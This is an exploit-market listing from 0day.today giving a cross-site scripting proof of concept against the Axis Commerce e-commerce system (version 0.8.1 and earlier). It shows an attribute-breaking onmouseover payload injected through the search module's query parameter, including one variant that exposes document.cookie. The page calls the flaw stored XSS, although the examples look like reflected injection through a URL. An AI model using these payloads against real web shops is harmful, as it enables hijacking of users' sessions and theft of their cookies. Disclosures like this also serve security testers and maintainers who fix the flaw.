[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Axis Commerce (E-Commerce System) Stored XSS

Author
Eyup CELIK
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16728
Category
web applications
Date add
20-08-2011
Platform
php
# Exploit Title: Axis Commerce (E-Commerce System) Stored XSS
# Date: 19.08.2011
# Author: Eyup CELIK
# Software Link: https://github.com/downloads/axis/axiscommerce/axis-0.8.1.zip
# Version: 0.8.1 and previus
# Tested on: Apache (For Windows)
 
ISSUE
 
Vulnerable Modules => Search Module
 
XSS can be done using the command input
 
Example Code: " onmouseover=prompt(XSS Code) bad="
 
Example:
 
http://localhost/axis-0.7.0.4/search/result?q="onmouseover=prompt(906764) bad="
 
http://localhost/axis-0.7.0.4/search/result?q="onmouseover=prompt(document.cookie) bad="



#  0day.today [2024-12-25]  #